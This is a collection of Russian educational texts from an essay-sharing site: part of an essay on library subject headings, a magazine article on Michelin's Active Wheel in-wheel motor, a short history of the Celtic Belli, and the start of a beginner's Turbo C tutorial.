6. Пунктуация в предметных рубриках и подзаголовках.
Все знаки препинания в заголовках предметных рубрик употребляются в соответствии с правилами русского языка. В предметных рубриках и подзаголовках употребляются три знака:
запятая (для уточнения заголовка)
Тюмень, г.
Сложных систем, теория
скобки (для выделения дополнительных сведений и пояснений)
Блоки (избир)
формирование
Блоки (техн)
дверные
дефис (тире) при уточнении аспекта рассмотрения проблемы: Носки - производство
7. В тех случаях, когда одно понятие обозначается разными словами, синонимами, то необходимо из всех слов выбрать одно наиболее точное, а от других делается отсылка:
Абоненты см. Читатели
Книгочеи см. Читатели
Читатели 6, 13, 92, 109
Наименования предметов, выраженные омонимами, включаются с пояснениями - реляторами:
Коса (волосы)
Коса (орудие)
Коса (отмель)
8. От иностранных терминов, имеющих соответствующий эквивалент в русском языке, к русскому дается отсылка:
"Панча - Шила" см. Пять принципов мирного существования
Иностранные термины, не имеющие соответствующего эквивалента в русском языке, отражаются в русской транскрипции:
"Бойз клабз оф Америка"
"Бич бойз"
Фамилии и имена иностранных деятелей даются в русской транскрипции:
Дойл К.А.
Стофф К.
9. Для выбора ведущего слова (первого слова предметной рубрики) может быть использована инверсия:
Тиф брюшной
сыпной
Расследования парламентские
Регулирование государственное
При использовании инверсии соблюдаются следующие правила:
1. Если в словосочетании есть имя собственное в родительном падеже, то оно выбирается в качестве ведущего слова, а главное слово - существительное в именительном падеже инверсируется:
Правильно:
Ньютона бином
Уитли медаль
Неправильно:
Бином Ньютона
Медаль Уитли
2. Когда зависимое существительное стоит в родительном падеже, инверсия применяется только в тех случаях, если главное слово - существительное является типовым (закон, теория, метод и т.д.)
Правильно:
Ошибок теория
Буравчика закон
Неправильно:
Теория ошибок
Закон буравчика
3. Если прилагательное ограничивает объем понятия, выраженного существительным:
Тракторы
сельскохозяйственные
4. Ограничение на применение инверсии допустимо, когда словосочетания употребляются в полной и сокращенной форме
Правильно:
Библиотечно-библиографическая
Классификация
Неправильно:
Классификация
библиотечно-
библиографическая
3. Область применения
В настоящее время в мире насчитывается около десяти национальных списков предметных рубрик. Наиболее известный и распространенный список предметных рубрик Библиотеки Конгресса США. В его авторитетном файле содержится около 220 тысяч авторитетных заголовков.
В мировой практике описаны два подхода к созданию национальных списков предметных рубрик:
Оригинальная разработка списка (Великобритания, Германия, Польша, Финляндия)
Адаптация списка предметных рубрик Библиотеки Конгресса США (Канада, Франция)
В России основой Национального авторитетного файла предметных рубрик является авторитетный файл предметных рубрик Российской национальной библиотеки, созданный на базе предметного каталога, отражающего фонды данной библиотеки с начала 20-х годов ХХ века.
Национальный авторитетный файл предметных рубрик - стандартизированный машиночитаемый список предметных рубрик для библиотек России. Его цель - обеспечить максимальную эффективность тематического поиска библиографических записей и обмена ими, при организации кооперированной каталогизации, комфортность доступа к библиотечно-библиографической информации, накопленной в библиотеках и информационных центрах. Он включает в себя машиночитаемый список предметных рубрик со ссылочно-справочным аппаратом, представленный в Российском коммуникативном формате для авторитетных данных.
Национальный авторитетный файл предметных рубрик является универсальным, так как охватывает все отрасли знаний: естествознание, физико-математические и химические науки, технику и технологию, общественные науки, отрасли экономики и культуры, искусствоведение, произведения об исторических лицах и событиях, фольклорные произведения.
Общий объем авторитетного файла предметных рубрик составляет более 1 млн.300 тыс. записей; он постоянно пополняется.
В авторитетном файле предметные рубрики представлены преимущественно на русском языке, но также используются термины в английском (латинском) написании и в латинской графике, если термин более известен в английском (или латинском) написании и в латинской графике (марки машин, программное обеспечение).
Авторитетный файл предметных рубрик включает предметные рубрики, присвоенные документам (книги, журналы, ГОСТы) на русском языке (с 1931 г) и на иностранных европейских языках (книги, журналы) (с 1918 г), хранящиеся в фондах Российской Национальной библиотеки с 2004 г., в авторитетный файл предметных рубрик включен ряд предметных рубрик для нотных, картографических изданий, видеоизданий.
В авторитетном файле предметных рубрик представлены следующие категории авторитетных записей предметных рубрик:
Личные имена (включая литературные образы, имена мифологических и вымышленных персоналией);
Наименование организаций;
Географические названия (включая названия стран, географических объектов, небесных тел, астрономических объектов, а также архитектурных объектов - мостов, площадей, скверов, парков);
Родовые имена;
Заглавие как предметная рубрика (включая названия анонимных классических произведений, фильмов, радиопередач, произведений искусства, музыкальных произведений и т.д.);
Имя / заглавие как предметная рубрика (для произведений любого жанра - литературных, музыкальных, художественных и т.д.);
Имя / обобщающее унифицированное заглавие (для произведений любого жанра - литературных, музыкальных, художественных и т.д.);
Форма, жанр, физические характеристики документа как предметная рубрика;
Тематические понятия (включая названия продуктов, растений, животных, абстрактных понятий, исторических событий, периодов развития культуры, этнических групп, языков, технологических процессов, болезней и т.д.)
Национальный авторитетный файл предметных рубрик с 2001 г. используется в качестве лингвистического средства электронной версии сводного каталога библиотек России. Данный проект осуществляется семьюдесятью пятью библиотеками на основе принципов корпоративной каталогизации под эгидой информационного центра "Либнет".
Заключение
Информационно-поисковая система (ИПС) - это упорядоченная совокупность документов и информационных технологий, предназначенных для хранения и поиска информации. ИПС можно представить как базу данных с огромным количеством различной информации, которая, как правило, требует разработки собственного информационно-поискового языка, адекватного для каждой предметной области. Для общения пользователя с компьютером и оказания ему помощи в поиске нужной информации среди ее большого потока разрабатываются специальные искусственные языки, так как естественный язык в этом качестве пока не может быть использован без специального предварительного преобразования. В естественном языке присутствуют: синонимия, омонимия и полисемия, избыточность, субъективность и другие свойства, препятствующие его автоматизированной обработке. А информационно-поисковый язык - это искусственный язык, в котором отсутствуют недостатки естественного языка, но он строится на его принципах и понятен пользователю. Основное назначение ИПЯ - установить принадлежность того или иного документа к определенной группе понятий. Одним из таких ИПЯ является язык предметных рубрик, предназначенный для облегчения тематического поиска. Предметные рубрики, входящие в состав ИПЯ, отражают наименование отраслей знания, научных дисциплин, процессов, явлений, событий, личных имен (персоналий) и т.д. Предметная рубрика должна соответствовать определенным требованиям и правилам. И от того, насколько правильно составлена, оформлена и сгруппирована предметная рубрика зависит выполнение поисково-информационной функции языка.
Список литературы
1. Демидова С.Е. Предметные указатели к документам: учебно-методическое пособие для студентов вузов - М.: ИПО Профиздат, 2002
2. Захаров В.П. Информационные системы: учебно-методическое пособие - СПб., 2005
3. Избачков Ю.С. Информационные системы: учебник для вузов - 2-е изд. - СПб, Питер, 2006
4. Кудряев В.А. Документоведение и ДОУ и Менеджмент: учебник - М.: ИНФРА-М, 1999
5. Малыхина М.П. Базы данных: основы проектирования, использования - СПб: БХВ - Петербург, 2004
6. Хомоненко А.Д., Цыганков В.М., Мальцев М.Г. Базы данных: учебник для высших учебных заведений - 4-е изд. перераб. и доп. - СПб: КОРОНА принт, 2004
7. http://www.глоссарий.ru
8. http://www.erudition.ru
9. http://www.conference. kemsu.ru |
https://doc4web.ru/istoriya/belka-v-kolese.html | Белка в колесе | https://doc4web.ru/uploads/files/122/1cc2eaf39978eb535d8efe44bef0486b.docx | files/1cc2eaf39978eb535d8efe44bef0486b.docx | Белка в колесе
Владимир Санников
Двенадцать лет назад в лабораториях компании Michelin началось создание экологически чистого электрического колеса будущего, вмещающего в себя весь автомобиль, не считая кузова и сидений: двигатель, трансмиссию, подвеску, рулевое управление и тормозную систему
Авто с электрическими мотор-колесами обладают рядом веских преимуществ перед традиционными. В первую очередь это отсутствие множества сложных и тяжелых передаточных механизмов между двигателем и колесом - сцепления, трансмиссии, приводных валов и дифференциалов. Во-вторых, отменная динамика: компактные и легкие электрические моторы способны развивать крутящий момент вплоть до 700 Нм даже на самых низких оборотах. В-третьих, управляемое мотор-колесо делает автомобиль чрезвычайно маневренным -ведь все колеса могут вращаться с разной скоростью и даже в разных направлениях. Машина способна разворачиваться на 360 градусов, парковаться в самых сложных условиях и мгновенно адаптироваться к качеству дорожного покрытия. В-четвертых, значительно упрощается конструкция важнейшей для электромобилей системы регенерации энергии торможения. Ну и в-пятых, ничто не сможет сравниться с мотор-колесом в обеспечении активной безопасности движения - все продвинутые электромеханические алгоритмы типа ABS, ESP, Traction Control, Brake Assist и так далее запросто прошиваются в управляющий софт и воздействуют на каждое отдельное колесо.
За перечисленные преимущества мотор-колесо расплачивается столь же существенными недостатками. Главный из них - масса механизмов, помещаемых внутрь обода. Высокооборотные электродвигатели мотор-колес нуждаются в понижающем редукторе. Он должен быть компактным и герметичным. Редуктор добавляет несколько килограммов к общей массе колеса. Для традиционных автомобилей лишний вес в конструкции трансмиссии не критичен. Но для колес действует совершенно другой принцип. Большая неподрессоренная масса, или, говоря проще, тяжелые колеса, резко снижает комфорт и управляемость, повышает износ подвески, передает на кузов вибрации. Оптимальный вес колеса для среднеразмерного автомобиля составляет от 10 до 30 кг без учета шины. Вписаться в эти жесткие рамки мотор-колесу очень непросто.
Наконец, ремонт мотор-колеса представляет собой операцию, требующую высокой квалификации. Переобуться в обычной шиномонтажной мастерской у его владельца не получится. А если повреждение произойдет вдалеке от сервисного центра? Запасное мотор-колесо в багажнике? Вряд ли это возможно, ведь стоимость такой запаски отобьет всякое желание покупать электромобиль.
Электронная диета
Инженерам Michelin удалось побороть два главных недуга мотор-колес – размеры и вес. По словам Патрика Олива, руководителя подразделения компании по перспективным разработкам, масса мотор-колеса Active Wheel второго поколения в сборе, установленного на концепте Heuliez WILL, составляет 42, а неподрессоренная масса – 35 кг. Для сравнения – неподрессоренная масса переднего колеса хетчбэка Renault Clio равна 38 кг. Такого результата удалось добиться за счет предельной миниатюризации всех элементов конструкции – ведущего электродвигателя, одноступенчатого понижающего планетарного редуктора, электродвигателя управления подвеской и поворотом колес, пружин, тормозного механизма и системы жидкостного охлаждения. Достаточно сказать, что вес ведущего мотора в модификации системы для спорткара Venturi Volage составляет всего 7 кг при максимальной мощности 75 л.с. и крутящем моменте 58 Н•м, развиваемом в диапазоне от 0 до 8500 оборотов в минуту. Вся осталь ная механика внутри Active Wheel укладывается в 11 кг. Основа Active Wheel – легкая алюминиевая рама, которая простым жестким рычагом соединена с подрамником кузова. Соединение сделано подвижным, чтобы колесо могло поворачиваться. К внутренней поверхности рамы крепятся все элементы Active Wheel, а сам обод закрепляется на плоской дискообразной ступице. Тормозной механизм состоит из вращающегося диска и суппортов с электромагнитными актуаторами. Ведущий электродвигатель во время торможения работает в режиме генератора, вырабатывая электроэнергию для питания бортового аккумулятора. Подвеска состоит из стальной пружины и электрических амортизаторов. Моторчик, управляющий амортизаторами, отвечает также за поворот колеса. Благодаря большому углу поворота электромобиль значительно маневреннее обычных авто.
Сложным хозяйством Active Wheel управляет продвинутая электроника. По словам инженеров Michelin, время отклика электрической подвески составляет всего 0,003 с. Это на порядок быстрее реакции стандартного гидравлического амортизатора. Подвеска, характер которой может изменяться за тысячные доли секунды, позволяет больше не искать компромисс между плавностью хода и управляемостью. Более того, простым переключением кнопки на сенсорном дисплее приборной панели можно выбрать один из нескольких режимов жесткости подвески и остроты рулевого управления. Уникальная технология Michelin позволяет настраивать повадки автомобиля под настроение водителя. Хочется поджечь покрышки на скоростной трассе – пожалуйста, желаете медленно и комфортно прокатиться по тесным улочкам – нет проблем.
Обслуживание, ремонт и замена покрышек на колесах Active Wheel, по уверениям инженеров Michelin, не составит большой проблемы для владельцев. Обод колеса вместе с покрышкой сделан съемным. Не со всем ясно, насколько система Active Wheel будет устойчива к воздействию низких температур, грязи и влаги. Но думается, что разработчики колес для лунного внедорожника не могли упустить из виду такие важные моменты эксплуатации. Вероятно, ко времени появления серийных машин компания создаст специальную оснастку для автосервисов и шиномонтажного оборудования. По словам руководства Michelin, ждать осталось недолго. Серийное производство мотор-колес начнется в 2010 году в Китае. Там же будут собирать пакеты литий-ионных элементов для электромобилей с технологией Active Wheel.
Аэродинамика минус металлолом
Появление на Парижском автосалоне новейшего концепта небольшой экзотической автокомпании из Монако не случайно. Вот уже семь лет, с тех пор как у Venturi появился новый хозяин, Гильдо Пастор, компания удивляет публику невероятными разработками. Кредо Venturi – экологически чистый электропривод и эпатажный дизайн, автором которого является знаменитый французский дизайнер со славой бунтаря и хулигана Саша Лакич. Первой его работой стал родстер Venturi Fetish, показанный в Париже в 2002 году. Затем были созданы фантастический Astrolab, не похожий ни на что первый в мире автономный электромобиль Eclectic, использующий энергию солнца и ветра, и, наконец, Volage. Лучшего способа продемонстрировать уникальные качества Active Wheel, чем оснастить чудо-колесами Volage, было не придумать. Хайтек на грани реальности – вот что получилось в итоге. Venturi Volage – это двухместный родстер снаряженной массой 1075 кг, созданный на модернизированном шасси концепта Fetish. Осно ва кузова – очень легкая и жесткая платформа из полых алюминиевых панелей с сотовой структурой, облицованных с двух сторон карбоновым волокном. Для крепления мотор-колес спереди и сзади на платформе установлены жесткие подрамники из авиационной стали. Передний подрамник выполняет еще одну важную функцию – формирует переднюю сминаемую зону безопасности. На заднем помещается литийполимерный аккумулятор французской компании Zebra. Кузовные панели отформованы из многослойного карбонового листа. По словам создателя Volage Саши Лакича, дизайн родстера продиктован законами аэродинамики и вычитанием лишнего – ненужного двигателя, трансмиссии, подвески и еще целой кучи металлолома.
Развесовка автомобиля идеальна – 45% массы на передней оси и 55% – на задней. Для полноприводного автомобиля с четырьмя ведущими и управляемыми колесами это очень важно. Мощность каждого мотор-колеса составляет 75 лошадок. Итого 300! До сотни с места эта бесшумная ракета разгоняется всего за 4,9 с и развивает максималку 150 км/ч. Умная электроника чутко прислушивается к работе моторов, подвески и мгновенно корректирует малейшие отклонения от курса, заставляя каждое колесо вращаться со своей скоростью. Щербатую мостовую Volage преодолевает так, что седоки могут спокойно наслаждаться горячим кофе.
На подходе к прилавку Через три года в продаже появятся первые экземпляры Volage ручной сборки. Venturi оценивает обладание фантастическим электромобилем в €300 000. Автолюбители поскромнее уже в следующем году смогут приобрести серийный суперкомпакт Heuliez WILL с передними мотор-колесами Michelin Active Wheel суммарной мощностью 81 л.с. и запасом хода на одной зарядке литий-полимерной батареи от 150 до 400 км. Стоимость автомобиля составит €20 000. В качестве бонуса Heuliez предоставит клиентам широкополосный мобильный интернет-доступ прямо в салон и кучу полезных online-сервисов от корпорации Orange.
СХЕМА МОТОР-КОЛЕСА MICHELIN ACTIVE WHEEL
Два электродвигателя, электрическая подвеска, тормозные механизмы с электромагнитными актуаторами - все это помещается внутри обода автомобильного колеса
Технические характеристики
Venturi Volage
Двухместный полноприводный родстер
Начало малосерийного производства: 2012 год Предполагаемый объем выпуска:
10 экземпляров в год
Стоимость: €297 000
Силовая установка: 4 электромотора с жидкостным охлаждением по 55 кВт (75 л.с.) / 58 Нм при оборотах вала от 0 до 8500, масса одного ведущего мотора 7 кг, масса мотор-колеса в сборе (с учетом подвески, тормозной системы и шины) 35 кг
КПД силовой установки: 90%
Батарея: пакет литий-полимерных элементов емкостью 45 кВтч с жидкостным охлаждением Zebra
Масса батареи: 350 кг
Количество циклов заряда/разряда: 1500
Время заряда до 80% емкости: 4 часа с применением специального бустера мощностью 10 кВт, 8 часов при обычном режиме
Шасси: герметизированный алюминиево-карбоновый сэндвич с внутренней сотовой структурой, передний и задний подрамники из авиационной стали
Кузов: карбон
Подвеска: электрическая подвеска с управляющим электродвигателем Michelin Active Wheel, время отклика 0,003 с
Тормозная система: тормоза дисковые, с электромагнитными актуаторами и системой регенерации энергии торможения
Размеры и масса
Масса кузова: 1075 кг
Длина/ширина/высота: 3965 мм / 1949 мм / 1235 мм
Колесная база/колея: 2702 мм / 1525 мм / 1626 мм
Размерность колес п/з: Michelin 205 40 R18 / Michelin 235 45 R18
Динамика
Максимальная скорость: 150 км/ч
Разгон от 0 до 100 км/ч: 4,9 с
Запас хода на полной зарядке: 320 км (на скорости 90 км/ч)
Эволюция мотор-колеса: российские корни
Идея электрического мотор-колеса родилась практически сразу же после того, как появились достаточно мощные и компактные электромоторы.
Первые в истории патенты на подобные механизмы были получены в Америке Веллингтоном Адамсом из Сент-Луиса в 1884 году и еще через шесть лет – Альбертом Парселлом из Бостона. Но пионером в деле практического применения мотор-колес стал Фердинанд Порше. В 1900 году на Всемирной выставке в Париже был показан его электромобиль Lohner-Porsche с передними ведущими электрическими моторколесами. В 1906 году патент на силовую установку был продан Daimler, и до начала Первой мировой войны компания выпустила более 300 электромобилей. Впоследствии эта технология не получила развития, и всерьез к ней вернулись лишь после Второй мировой войны в СССР.
В рамках советской лунной программы ленинградский ВНИИтрансмаш создал шасси для планетохода с использованием электрического мотор-колеса. В его герметичном модуле помещались редуктор, электромотор, тормоза и необходимые датчики. Аналогичные проекты разрабатывались NASA. В конце 1970-х в Новосибирске был создан первый прототип колеса-мотора для автомобиля "жигули". В 1979 году на Волжском автозаводе такие колеса были собраны в металле и тогда же экспонировались на советско-американском симпозиуме по электромобилям.
В 1980–1990-х годах исследования технологии мотор-колес с разным успехом велись практически всеми крупными автокомпаниями. Интересно, что наибольших успехов на этом поприще вновь добились наши соотечественники Александр Пунтиков и Борис Маслов. В 1998 году они запатентовали оригинальную концепцию мотора, симулирующего работу человеческих мышц (Adaptive motor), а в 2000 году создали в Америке технологическую компанию Wavecrest Laboratories. Идея была успешно осуществлена на практике, и теперь мотор-колеса Пунтикова и Маслова используются в различных отраслях промышленности. Другой россиянин, изобретатель Владимир Шкондин, еще в начале 1990-х разработал мотор-колесо собственной конструк ции и запатентовал его в 28 странах мира. Уникальный механизм состоит всего из семи деталей. Стоит отметить еще одну интересную идею, родившуюся в России, – вариоколесо Н.В. Гулиа, М. Ференца и С.А. Юркова. Ученые предложили встроить бесступенчатый вариатор в ступицу колеса совместно с понижающей передачей. При более высокой сложности конструкции такое решение мотор-колеса дает серьезный выигрыш в компактности, массе и КПД.
Список литературы
Популярная механика № 4 (78) апрель 2009 |
https://doc4web.ru/istoriya/belli.html | Беллы | https://doc4web.ru/uploads/files/181/75de4dec8a677457411fa5a7e6ec81d4.docx | files/75de4dec8a677457411fa5a7e6ec81d4.docx | План
Введение
1 История
Список литературы
Введение
Беллы ( лат. Belli или Beli ) — древний кельтский народ на северо-востоке Пиренейского полуострова, населявший территорию современной испанской провинции Сарагоса. Главным их городом была Сегеда (Segeda). Другими важными городами являлись Nertóbriga и Bilbilis. Чеканили несколько разновидностей собственных монет. Основой экономики беллов было сельскохозяйственное производство, а так же металлургия. Плодородные почвы области их расселения давали хорошие урожаи зерновых культур ( в частности ячменя), также у беллов было развито производство оливкого масла.
1. История
Беллы были смешанного кельтского и иллирийского происхождения и мигрировали в Иберию около IV века до н.э., обосновавшись в средней части долины реки Эбро [1]. Вероятно были родственны белгскому племени белловаков [2].
В III веке до н.э. вошли в состав так называемой кельтиберской конфедерации, противостоявшей Риму, куда помимо беллов входили племена ареваков, титтиев и лузонов, с которыми они находились в близких военно-политических связях.
В 179 году до н.э. подписан мирный договор между Тиберием Семпронием Гракхом и кельтиберами[3], одним из условий которого, являлось нерасширение городских стен Сегеды. Но в 154 году до н.э. беллы нарушили договор, расширив стены, что дало Риму формальный повод ( casus belli) для начала войны. В 153 году до н.э., во время Первой нумантийской войны состоялось сражение между войсками конфедерации и тридцатитысячной армией римского консула Квинта Фульвия Нобилиора[4] , в ходе которой погибло 6000 римлян. С падением Нуманции в 133 году до н.э. и крахом кельтиберской конфедерации, территория расселения беллов вошла в состав провинции Ближняя Испания. В дальнейшем беллы постепенно романизировались.
Список литературы:
Плиний Старший , Естественная история, 3, 29
Страбон , География, III, 4, 12
Аппиан, Iberiké, 44
Диодор Сицилийский , Историческая библиотека, 29, 28
Источник: http://ru.wikipedia.org/wiki/Беллы |
https://doc4web.ru/informatika/yazik-programmirovaniya-s-1.html | Язык программирования С 2 | https://doc4web.ru/uploads/files/171/c90e9aef5f930e0797e78776c9c3eee5.docx | files/c90e9aef5f930e0797e78776c9c3eee5.docx | ЯЗЫК
ПРОГРАММИРОВАНИЯ
С++
Балашиха 2010
1. ОСНОВНЫЕ ЭЛЕМЕНТЫ ПРОГРАММЫ
1.1. Изучаемая версия языка
Существует большое количество версий языка Си. Мы будем изучать язык Турбо Си 2.0 фирмы Borland. При желании можно пользоваться версиями Турбо С++ 3.0 или Borland C++ 3.1. Для самостоятельной работы с этим языком программирования рекомендуется книга [3], в которой рассматривается версия языка Си фирмы Borland.
1.2. Программа «Hello World»
1.2.1. Пример 1.1
Основные элементы рассмотрим на примере простейшей программы, предложенной ее создателем Денисом Ритчи [1]. При вводе программы необходимо точно соблюдать ее синтаксис, а именно:
– вводить программу строчными буквами;
– некоторые строки программы заканчиваются символом точка с запятой.
Листинг 1.1
/* Программа `Привет мир!` */
#include <stdio.h> /* подключение файла библиотеки */
void main(void) /* главная функция */
{ /* начало блока */
printf(“Hello world!\n”); /* вывод на экран сообщения */
} /* конец блока */
Рассмотрим основные элементы программы.
1.2.2. Комментарии
Комментарий начинается с символов /* и заканчивается теми же символами, идущими в обратном порядке */. Они служат для ввода пояснений в программе. Например, строка
/* главная функция */
представляет собой комментарий. При запуске программы комментарии компилятором языка игнорируются.
Обычно принято начинать программу с комментария, в котором указано назначение программы. В комментарии можно использовать любые символы, в том числе и символы русского алфавита. Каждый комментарий может занимать строку программы целиком, часть ее или несколько строк. Например, допустим следующий вариант:
/* Это
просто
строка
комментария */
1.2.3. Заголовочные файлы
Вначале содержательной части программы на языке Си всегда используются так называемые «директивы препроцессора», начинающиеся с символа #. В данной программе используется строка
#include <stdio.h>
которая означает, что необходимо подключить заголовочный файл «stdio.h». Это позволяет использовать в программе библиотеку стандартного ввода-вывода, а именно, в данной программе используется функция стандартного вывода данных на экран printf().
При использовании в программе функций из других библиотек для подключения последних необходимо включить соответствующий файл. В программах наиболее часто будут встречаться следующие заголовочные файлы:
stdio.h
библиотека стандартного ввода-вывода, например, для использования функций ввода с клавиатуры и вывода на экран scanf() и printf(), ввода/вывода в файл fprintf()и fscanf()
conio.h
библиотека консольного ввода-вывода, например, для функций ввода одиночного символа getch(), конольного ввода/вывода cscanf() и cprintf(), очистки экрана clrscr(), перемещения курсора gotoxy(), изменения цвета символов textcolor()
math.h
математическая библиотека, например, для функций sqrt(), sin(), cos(), log(), exp()
graphics.h
графическая библиотека, например, для функций инициализации графики initgraph(), рисования графических примитивов line(), rectangle()
При необходимости использования функций из нескольких библиотек в начале программы указываются все требуемые заголовочные файлы. Например, при использовании математических функций, функций стандартного и консольного ввода-вывода в заголовке программы записываются следующие строки:
#include <stdio.h>
#include <conio.h>
#include <math.h>
1.2.4. Главная функция
Листинг программы на Си содержит одну или несколько функций. Обязательным является использование главной функции – функции main(). Строка описания главной функции в приведенной программе содержит ключевое слово void. Это означает, что после окончания функции ничего не возвращается. В общем виде описание каждой функции, в том числе и функции main(), имеет следующий синтаксис (символы русского алфавита и знаки < и > используются только для пояснения):
<ТипВозвращаемогоЗначения> <ИмяФункции> (<СписокФормальныхПеременных>)
где <ТипВозвращаемогоЗначения> – результат исполнения функции, точнее тип возвращаемого значения переменной (допустимо использовать разрешенные типы, например, void, int, float и т.д.);
<ИмяФункции> – идентификатор (имя) функции;
<СписокФормальныхПеременных> – перечень типов и идентификаторов формальных переменных.
Чтобы стала понятной эта форма описания функции, приведем запись функции в естественной математической форме:
y = sin ( x )
ТипВозвращаемогоЗначения ИмяФункции СписокФормальныхПеременных
В рассматриваемом примере программы «Hello World!» строка описания заголовка функции
void main(void)
означает, что имя функции main, список формальных параметров отсутствует и после ее завершения ничего не возвращается.
1.2.5. Начало и конец функции или блока
Любая функция на языке содержит «тело» – список операторов, которые выполняются при ее вызове. Принадлежность операторов данной функции определяется символами открывающей фигурной скобки { и закрывающей скобки }. В общем случае эти символы начала и конца блока можно использовать не только для функций, но и для операторов управления, позволяющих изменить ход исполнения программы: операторов if, switch, for, while , do-while.
1.2.6. Вывод на экран сообщения
Для вывода данных на экран в языке Си имеется достаточно большое количество средств. Наиболее часто используется функция printf() из стандартной библиотеки ввода-вывода. В простейшем случае, как в приведенном примере, эта функция содержит только один параметр – строку, начинающуюся и завершающуюся символом двойной кавычки ″…″. Все, что заключено внутри строки, выводится на экран при исполнении программы. Содержимое строки может быть записано как на латинском, так и на русском языке.
Помимо обычного текста в строке можно указать специальные символы, позволяющие вывести значения переменных, выполнить перевод строки, горизонтальную табуляцию, подать звуковой сигнал и т.д. Специальный символ начинается с символа обратного слеша, например:
\n – перевод строки;
\t – горизонтальная табуляция (перенос курсора вправо на несколько позиций);
\а – подача звукового сигнала.
Количество и последовательность специальных символов не ограничивается. Например, вызов функции
printf(“Эта\n\tПросто\n\t\tСтрока\n”);
позволит вывести на экран сообщение в нескольких строках со смещением в каждой новой строке:
Эта
Просто
Строка
В рассматриваемом примере программы на экран выводится сообщение “Hello world!” и курсор переводится на новую строку.
Следует отметить еще одну важную деталь – практически все операторы внутри функции заканчиваются символами точка с запятой, операторы вне функций обычно записываются без этих символов.
1.2.7. Запуск программы на компиляцию, компоновку и исполнение
После записи в редакторе языка программы для ее запуска необходимо выполнить следующую последовательность действий:
1) нажать клавишу F2 и ввести имя файла – при этом выполняется сохранение файла на диске (расширение «*.c» указывать необязательно);
2) нажать клавиши ALT-F9 – запустить программу на компиляцию, при этом проверяется синтаксис написания программы. После компиляции на экране появляется окно компилятора (рис. 1.1), содержащее информацию об ошибках и предупреждениях.
Рис. 1.1. Компиляция программы
Если программа написана без ошибок, то можно выполнять дальнейшие действия (в строках Errors и Warning окна компилятора должны стоять цифры 0);
3) нажать клавиши Ctrl-F9 – запустить компоновщик программы и при нулевом количестве ошибок программа запускается на исполнение (компоновщик подключает библиотечные файлы);
4) нажать клавиши Alt-F5 – окно просмотра исполнения программы.
После выполнения всех этих операций с рассматриваемой программой «Hello World!» на экране появится результат – выполнится вывод сообщения:
Hello world!
1.3. Программа ввода данных и вывода суммы
1.3.1. Пример 1.2
Усложним программу: необходимо ввести с клавиатуры два целых чисел и результат вывести на экран.
Листинг 1.2
/* Расчет суммы двух чисел */
#include <stdio.h>
#include <conio.h>
main()
{
int a,b,c; /* объявление трех целых переменных */
clrscr(); /* очистка экрана */
printf(“Введите два целых числа:\n”);
scanf(“%d%d”,&a,&b); /* ввод с клавиатуры двух переменных */
c=a+b; /* выполнение арифметической операции */
printf(“Сумма чисел равна: %d\n”,c);
/* вывод результата */
getch(); /* ожидание нажатия любой клавиши */
}
Рассмотрим только новые элементы программы.
1.3.2. Подключение библиотеки консольного ввода – вывода выполняется строкой
#include <conio.h>
Эта библиотека необходима для использования двух новых функций: очистки экрана вначале программы
clrscr();
и ожидания нажатия любой клавиши после ее завершения
getch();
Кроме всего библиотека <conio.h> используется для ввода–вывода данных в указанное место на экране, с заданными атрибутами (цветом фона и символов).
1.3.3. Объявление трех переменных целого типа выполняется строкой
int a,b,c;
После этого в программе можно использовать переменные с именами a, b и c. Все переменные, которые будут использоваться в программе, написанной на языке Си, должны быть обязательно объявлены. Объявление переменных выполняется сразу после открывающей фигурной скобки и определяет имя переменной и её тип. К основным типам переменных относятся переменные типа символ (обозначаются ключевым словом ‘char’), целое число (ключевое слово ‘int’), типа вещественное число (ключевое слово ‘float’). В данном примере используются три целые переменные, поэтому применяется ключевое слово ‘int’, а сами переменные перечисляются через запятую. В конце строки обязательно используется точка с запятой, означающая конец объявления переменных.
1.3.4. Форматированный ввод значений переменных с клавиатуры
Выполняется функцией форматированного ввода scanf(). Первый параметр функции является строкой “%d%d”, содержащей, так называемые, спецификации формата ввода переменных. Спецификация начинается с символа %, за которым следует код формата, например, формат для целого числа представляет собой последовательность символов %d. В данном примере строка определяет ввод двух целых переменных. Остальные параметры функции scanf() определяют адреса вводимых переменных, т.е. каким переменным будут присвоены введенные значения. При указании адреса переменной на языке Си перед ее именем устанавливается знак & конъюнкции.
1.3.4. Вычисление значения переменной
Вычисление в выражении
c=a+b;
выполняется в два этапа: вначале находится сумма значений переменных а и b, затем результат присваивается переменной с. Операция суммирования двух переменных, также как и остальные операторы в теле функции main(), заканчивается точкой с запятой.
1.3.5. Форматированный вывод на экран
В строке “Сумма чисел равна: %d\n”, используемой в функции форматированного вывода printf() помимо простого сообщения содержится спецификация формата вывода на экран значения целой переменной. Однако, в отличие от функции scanf(), в функции printf() после строки идет перечень имен переменных, а не их адресов.
1.3.6. Исполнение программы
После ввода программы, ее компиляции, компоновки и запуска на исполнение на чистом экране появится сообщение “Введите два целых числа:”. После этого необходимо будет ввести два целых числа. Пример выполнения программы приведен ниже:
Введите два целых числа:
10
13
Сумма чисел равна: 23
1.4. Интегрированная среда разработки программ
1.4.1. Окно редактора
При работе с программой Турбо Си все средства разработки программы, а именно, редактирование, компиляция, компоновка, отладка программы, находятся под рукой. Эти средства называются интегрированной средой разработки (оболочкой программы). На рис. 1.2 представлена интегрированная среда с набранной программой «Привет мир!».
Строка меню позволяет выполнить команды интегрированной среды, такие как сохранение и загрузка файла, компиляция, создание файла проекта и т.д. В рабочей области выполняются операции редактирования программы, выводятся сообщения о компиляции, компоновке и отладчике. В верхней части рабочей области в режиме редактирования приводится строка состояния, содержащая координаты текущего положения курсора в файле (Line, Col – номера строки и столбца), режим вставки/замещения символов (Insert – режим вставки). В конце этой строки приводится имя редактируемого файла.
Рис. 1.2. Интегрированная среда разработки
1.4.2. Пункты меню интегрированной среды
Вход в меню среды разработки выполняется нажатием клавиши F10. Состав и назначение пунктов меню интегрированной среды разработки представлено в табл. 1.1.
Пункты меню интегрированной среды разработки
Таблица 1.1
Пункт меню
Подпункт / команда
Назначение
File
файловые команды
Load
загрузка файла с диска
New
создание нового файла
Save
сохранение файла на диске
Write to
сохранение файла под другим именем
Quit
выход из интегрированной среды
Edit
редактирования файла
Run
запуск на исполнение программы, а также инициализация и завершение режима отладки программы
Compile
компиляция программы
Project
команды управления проектом многофайловой программы
Options
команды просмотра и изменения параметров среды разработки
Compiler
параметры компилятора (модели памяти, коды генерации и т.д.)
Linker
параметры компоновщика (подключение графической библиотеки и др.)
Environment
параметры среды (автосохранение текущего редактируемого файла и файла конфигурации, режим экрана и др.)
Directories
указание на местоположение включаемых файлов, библиотечных файлов, файла помощи (справки)
Arguments
аргументы командной строки
Save options
